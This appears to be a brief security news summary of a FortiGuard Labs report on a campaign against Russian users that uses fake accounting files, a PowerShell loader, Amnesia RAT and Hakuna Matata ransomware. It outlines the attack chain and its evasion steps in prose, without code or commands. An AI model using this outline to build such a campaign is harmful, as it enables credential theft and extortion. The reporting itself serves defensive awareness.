FORTIGUARD Labs researchers uncovered a multi-stage malware campaign primarily targeting users in Russia, using fake business documents as social engineering lures to distract victims while the malware operates in the background. The attack chain begins when a victim opens a compressed archive that appears to contain ordinary accounting files; a shortcut file then runs PowerShell to download a script from GitHub, with no exploits required and reliance on user interaction instead.
The loader script, kira.ps1, hides its window, creates a decoy document, and notifies the attacker via Telegram to confirm infection before pulling an obfuscated VBScript into memory. The main controller script rebuilds the real malicious code only in memory using Base64 and RC4, reducing detection, and escalates privileges through repeated UAC prompts.
In the final phase, Amnesia RAT is installed to maintain long-term control and steal data, including browser credentials, Telegram sessions, crypto wallets, and system information, with capabilities for screenshots and remote commands. Hakuna Matata ransomware is deployed alongside to encrypt files and pressure victims through desktop lock and clipboard monitoring, according to the FortiGuard Labs report.